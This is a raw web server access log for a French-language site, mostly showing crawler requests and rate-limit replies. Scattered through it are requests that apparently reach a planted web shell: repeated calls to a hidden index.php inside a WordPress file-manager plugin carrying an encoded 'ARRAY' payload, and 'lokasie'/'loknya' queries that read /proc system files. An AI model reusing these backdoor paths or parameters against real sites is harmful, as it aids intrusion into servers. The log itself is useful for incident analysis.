82.165.90.0 - - [18/Aug/2026:00:08:28 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030383130382p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343530382q6335623637363638633634303035633563643639316462643163333938333065222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
74.7.243.0 - - [18/Aug/2026:00:09:03 +0200] "GET /?lokasie=/proc/sys/net/ipv4//tcp_ecn_fallback&loknya=/proc/sys/net/ipv4/ HTTP/1.1" 200 4090 cultureloisirs.club "https://cultureloisirs.club/?loknya=/proc/sys/net/ipv4/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:09:04 +0200] "GET /?shop/items/F7394974283/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:09:05 +0200] "GET /?h=61412761145753 HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:09:07 +0200] "GET /?shop/items/P71411162750/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:09:15 +0200] "GET /?shop/items/U61302205035/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
74.7.243.0 - - [18/Aug/2026:00:09:17 +0200] "GET /?lokasie=/proc/sys/net/ipv6//ip_nonlocal_bind&loknya=/proc/sys/net/ipv6/ HTTP/1.1" 200 4090 cultureloisirs.club "https://cultureloisirs.club/?loknya=/proc/sys/net/ipv6/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:09:19 +0200] "GET /?shop/items/Y1299817297/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
66.249.66.0 - - [18/Aug/2026:00:09:21 +0200] "GET /?h=21198764146017 HTTP/1.1" 200 787562 cultureloisirs.club "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.7922.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:09:22 +0200] "GET /?h=25267242940775 HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:09:23 +0200] "GET /?shop/items/H56011266525/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:09:25 +0200] "GET /?h=5044504502136 HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:09:28 +0200] "GET /?shop/items/K4085631543/ HTTP/1.1" 200 51697 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
74.7.243.0 - - [18/Aug/2026:00:09:31 +0200] "GET /?lokasie=/proc/sys/net/ipv4//icmp_echo_ignore_all&loknya=/proc/sys/net/ipv4/ HTTP/1.1" 200 4094 cultureloisirs.club "https://cultureloisirs.club/?loknya=/proc/sys/net/ipv4/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:09:31 +0200] "GET /?shop/items/H5601134601/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
74.7.243.0 - - [18/Aug/2026:00:09:42 +0200] "GET /?lokasie=/proc/sys/net/ipv4//ipfrag_high_thresh&loknya=/proc/sys/net/ipv4/ HTTP/1.1" 200 4098 cultureloisirs.club "https://cultureloisirs.club/?loknya=/proc/sys/net/ipv4/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:09:51 +0200] "GET /?shop/items/M26922193132/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
74.7.243.0 - - [18/Aug/2026:00:09:53 +0200] "GET /?lokasie=/proc/sys/net/ipv6//ip6frag_low_thresh&loknya=/proc/sys/net/ipv6/ HTTP/1.1" 200 4098 cultureloisirs.club "https://cultureloisirs.club/?loknya=/proc/sys/net/ipv6/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)" "-"
74.7.243.0 - - [18/Aug/2026:00:10:03 +0200] "GET /?lokasie=/proc/sys/net/ipv4//tcp_min_snd_mss&loknya=/proc/sys/net/ipv4/ HTTP/1.1" 200 4090 cultureloisirs.club "https://cultureloisirs.club/?loknya=/proc/sys/net/ipv4/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:10:03 +0200] "GET /?shop/items/F7394921463/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:10:06 +0200] "GET /?shop/items/P7141121446/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
74.7.243.0 - - [18/Aug/2026:00:10:11 +0200] "GET /?lokasie=/proc/sys/net/ipv4//tcp_ecn&loknya=/proc/sys/net/ipv4/ HTTP/1.1" 200 4081 cultureloisirs.club "https://cultureloisirs.club/?loknya=/proc/sys/net/ipv4/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)" "-"
66.249.66.0 - - [18/Aug/2026:00:10:15 +0200] "GET /?h=95538774795435 HTTP/1.1" 200 810893 cultureloisirs.club "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.7922.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:10:17 +0200] "GET /?h=74594712445570 HTTP/1.1" 200 51727 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
74.7.243.0 - - [18/Aug/2026:00:10:19 +0200] "GET /?lokasie=/proc/sys/net/ipv4//tcp_base_mss&loknya=/proc/sys/net/ipv4/ HTTP/1.1" 429 267 cultureloisirs.club "https://cultureloisirs.club/?loknya=/proc/sys/net/ipv4/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:10:25 +0200] "GET /?shop/items/H56011249377/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
74.7.243.0 - - [18/Aug/2026:00:10:26 +0200] "GET /?lokasie=/proc/sys/net/ipv4//ip_no_pmtu_disc&loknya=/proc/sys/net/ipv4/ HTTP/1.1" 429 267 cultureloisirs.club "https://cultureloisirs.club/?loknya=/proc/sys/net/ipv4/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:10:34 +0200] "GET /?h=1856606250049 HTTP/1.1" 200 51697 cultureloisirs.club "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:10:38 +0200] "GET /?shop/items/P3225515234/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:10:42 +0200] "GET /?h=768212751232 HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
74.7.243.0 - - [18/Aug/2026:00:10:47 +0200] "GET /?lokasie=/proc/sys/net/ipv4//icmp_ratelimit&loknya=/proc/sys/net/ipv4/ HTTP/1.1" 429 267 cultureloisirs.club "https://cultureloisirs.club/?loknya=/proc/sys/net/ipv4/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:10:50 +0200] "GET /?h=21165793945158 HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
66.249.66.0 - - [18/Aug/2026:00:10:51 +0200] "GET /?h=63962941986731 HTTP/1.1" 200 791933 cultureloisirs.club "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.7922.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:10:57 +0200] "GET /?h=81541354472675 HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:11:03 +0200] "GET /?h=59497481945342 HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:11:08 +0200] "GET /?shop/items/F7394912032/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:11:15 +0200] "GET /?shop/items/P32255244926/ HTTP/1.1" 200 51699 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:11:19 +0200] "GET /?shop/items/K40856150167/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:11:25 +0200] "GET /?h=2599040771856 HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:11:29 +0200] "GET /?h=47337831441551 HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:11:35 +0200] "GET /?h=76676964698365 HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:11:39 +0200] "GET /?shop/items/U61302133039/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:11:43 +0200] "GET /?shop/items/F7394929656/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:11:46 +0200] "GET /?shop/items/C33932197152/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:11:48 +0200] "GET /?shop/items/C3393281256/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:11:49 +0200] "GET /?h=18796322390851 HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
74.7.243.0 - - [18/Aug/2026:00:11:50 +0200] "GET /?lokasie=/proc/sys/net/ipv6//bindv6only&loknya=/proc/sys/net/ipv6/ HTTP/1.1" 200 4084 cultureloisirs.club "https://cultureloisirs.club/?loknya=/proc/sys/net/ipv6/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:11:53 +0200] "GET /?shop/items/C33932129584/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:11:55 +0200] "GET /?shop/items/Y12998172932/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:12:01 +0200] "GET /?shop/items/P71411224382/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
82.165.90.0 - - [18/Aug/2026:00:08:50 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030383133302p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343533302q3761386631323639386334386537623466336366316265303839373263343133222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:09:12 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030383135322p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343535322q3563343963393033303266393961323138633330666266323834653533613131222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:09:34 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030383137342p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343537342q6237356235396461666136663733303666343233326636363336303964626236222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:09:56 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030383139362p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343539362q3633393932636136343236333639633336383035636164383639363437663034222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:10:18 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030383231382p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343631382q3530613939633062346633656135616338393365646237616565666531613639222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:10:40 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030383234302p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343634302q6336303830343036613062326434363063663264346565643532366235353862222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:11:02 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030383236322p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343636322q6336333139373363326333646561303334386236313362386533306666313436222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:11:24 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030383238342p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343638342q3035303739653135396361333239396339363838393236633632306663346437222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:12:05 +0200] "GET /?shop/items/U61302277733/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:12:11 +0200] "GET /?h=19098301608141 HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:12:12 +0200] "GET /?shop/items/H560112381/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
66.249.66.0 - - [18/Aug/2026:00:12:13 +0200] "GET /?h=21423712114724 HTTP/1.1" 200 808085 cultureloisirs.club "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.7922.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:12:22 +0200] "GET /?h=22345134182130 HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:12:24 +0200] "GET /?shop/items/H56011176817/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Edg/145.0.0.0 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:12:26 +0200] "GET /?shop/items/Y1299881036/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:12:34 +0200] "GET /?shop/items/Y1299841219/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Edg/144.0.0.0 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
66.249.66.0 - - [18/Aug/2026:00:12:35 +0200] "GET /?h=15339061477626 HTTP/1.1" 200 803396 cultureloisirs.club "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.7922.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
